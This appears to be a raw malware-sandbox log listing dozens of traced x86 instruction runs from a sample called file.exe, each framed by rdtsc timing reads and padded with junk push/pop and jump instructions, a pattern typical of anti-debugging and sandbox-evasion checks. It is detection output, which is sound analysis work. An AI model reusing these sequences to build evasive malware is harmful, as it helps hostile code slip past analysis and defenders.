Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE94DB second address: CE9535 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4CC6E2B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pop ecx 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F2B4CC6E2A8h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 0000001Ch 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b push 0000001Eh 0x0000002d mov cx, B22Fh 0x00000031 mov edx, dword ptr [ebp+122D33D8h] 0x00000037 nop 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE9535 second address: CE9539 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE9539 second address: CE9543 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2B4CC6E2A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE9805 second address: CE980F instructions: 0x00000000 rdtsc 0x00000002 js 00007F2B4D4AC9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE980F second address: CE9836 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F2B4CC6E2A8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F2B4CC6E2B4h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE9897 second address: CE98C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4D4AC9ECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F2B4D4AC9F7h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE98C0 second address: CE98C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D18BD5 second address: D18BD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D18BD9 second address: D18BDF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D18BDF second address: D18BE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D18BE8 second address: D18BED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D18BED second address: D18BF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D18BF2 second address: D18BFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D18BFA second address: D18C0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jmp 00007F2B4D4AC9EBh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D18D65 second address: D18D6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D18EFB second address: D18F17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2B4D4AC9F8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D18F17 second address: D18F1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D18F1B second address: D18F27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D18F27 second address: D18F2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D18F2F second address: D18F3C instructions: 0x00000000 rdtsc 0x00000002 je 00007F2B4D4AC9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D19098 second address: D1909C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1949C second address: D19512 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2B4D4AC9F9h 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F2B4D4AC9F8h 0x00000010 popad 0x00000011 jmp 00007F2B4D4AC9F6h 0x00000016 push eax 0x00000017 push edx 0x00000018 push ebx 0x00000019 jmp 00007F2B4D4AC9ECh 0x0000001e pop ebx 0x0000001f jmp 00007F2B4D4AC9F8h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D19659 second address: D1969C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007F2B4CC6E2A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F2B4CC6E2B2h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F2B4CC6E2B0h 0x00000018 jmp 00007F2B4CC6E2B3h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1969C second address: D196AA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007F2B4D4AC9E6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1E105 second address: D1E10A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1E682 second address: D1E6A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2B4D4AC9F7h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1E6A1 second address: D1E6AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F2B4CC6E2A6h 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1E83E second address: D1E866 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 pop esi 0x00000008 jmp 00007F2B4D4AC9F5h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jo 00007F2B4D4AC9F2h 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1F066 second address: D1F078 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a je 00007F2B4CC6E2A6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1F078 second address: D1F09E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F2B4D4AC9F8h 0x0000000b jnc 00007F2B4D4AC9E6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1F09E second address: D1F0A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D279AC second address: D279B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2AB50 second address: D2AB6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F2B4CC6E2B6h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2AB6C second address: D2AB70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2AB70 second address: D2AB7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2A5E2 second address: D2A5F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007F2B4D4AC9E6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2A5F3 second address: D2A5F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2A88D second address: D2A89A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2A89A second address: D2A8A8 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F2B4CC6E2A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2A8A8 second address: D2A8AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D33814 second address: D33826 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jl 00007F2B4CC6E2A6h 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D33826 second address: D3382C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3382C second address: D3383A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3383A second address: D33840 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA6442 second address: CA6448 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA6448 second address: CA644C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA644C second address: CA6467 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4CC6E2B5h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA6467 second address: CA647E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2B4D4AC9EDh 0x00000009 je 00007F2B4D4AC9E6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA647E second address: CA6482 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D32357 second address: D32366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edi 0x00000007 js 00007F2B4D4AC9E8h 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D32627 second address: D3262E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3262E second address: D3263A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F2B4D4AC9E6h 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3263A second address: D32666 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F2B4CC6E2AEh 0x0000000c pushad 0x0000000d popad 0x0000000e jp 00007F2B4CC6E2A6h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 jnp 00007F2B4CC6E2C6h 0x0000001c js 00007F2B4CC6E2AAh 0x00000022 push ebx 0x00000023 pop ebx 0x00000024 push ecx 0x00000025 pop ecx 0x00000026 push eax 0x00000027 push edx 0x00000028 push esi 0x00000029 pop esi 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D32666 second address: D3266A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D32922 second address: D3292C instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2B4CC6E2A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3292C second address: D32934 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D32934 second address: D32938 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D32BA0 second address: D32BB2 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2B4D4AC9EAh 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D32BB2 second address: D32BD2 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F2B4CC6E2A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F2B4CC6E2AFh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D32BD2 second address: D32BD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D32BD6 second address: D32BE5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4CC6E2ABh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D36A73 second address: D36A8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F2B4D4AC9F1h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D36FE0 second address: D36FE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3727F second address: D37283 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D37283 second address: D3728D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3B864 second address: D3B880 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2B4D4AC9F7h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3B880 second address: D3B886 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3B886 second address: D3B88C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3B88C second address: D3B890 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D43BB2 second address: D43BCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2B4D4AC9F6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D43BCC second address: D43BDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jne 00007F2B4CC6E2A6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D43BDC second address: D43BE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D43E7A second address: D43E8A instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2B4CC6E2A6h 0x00000008 je 00007F2B4CC6E2A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4442C second address: D44432 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D44432 second address: D44438 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D44438 second address: D44442 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F2B4D4AC9E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4472A second address: D44746 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4CC6E2AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007F2B4CC6E2B2h 0x0000000f jc 00007F2B4CC6E2A6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D44746 second address: D44756 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jc 00007F2B4D4AC9F6h 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D44756 second address: D4475C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D44CD8 second address: D44CFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edi 0x00000007 jne 00007F2B4D4ACA04h 0x0000000d jmp 00007F2B4D4AC9F8h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA2E0C second address: CA2E1B instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2B4CC6E2A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA2E1B second address: CA2E24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4CF44 second address: D4CF5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2B4CC6E2ACh 0x00000009 jno 00007F2B4CC6E2A6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4CF5A second address: D4CF5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4D209 second address: D4D20F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4D20F second address: D4D23A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2B4D4AC9F0h 0x00000009 popad 0x0000000a jmp 00007F2B4D4AC9F6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4D654 second address: D4D663 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2B4CC6E2ABh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4D7F7 second address: D4D801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4D801 second address: D4D827 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F2B4CC6E2A6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 jl 00007F2B4CC6E2A6h 0x00000016 pop edi 0x00000017 jmp 00007F2B4CC6E2AFh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D56833 second address: D56851 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F2B4D4AC9E6h 0x0000000a jmp 00007F2B4D4AC9F2h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D54996 second address: D549B7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F2B4CC6E2B8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D549B7 second address: D549D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F2B4D4AC9F8h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D54E73 second address: D54E77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D54FB1 second address: D54FBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F2B4D4AC9E6h 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D54FBC second address: D54FC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D54FC6 second address: D54FCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D54FCC second address: D54FDD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4CC6E2ADh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5585A second address: D55873 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4D4AC9F5h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D55873 second address: D55883 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007F2B4CC6E2A6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
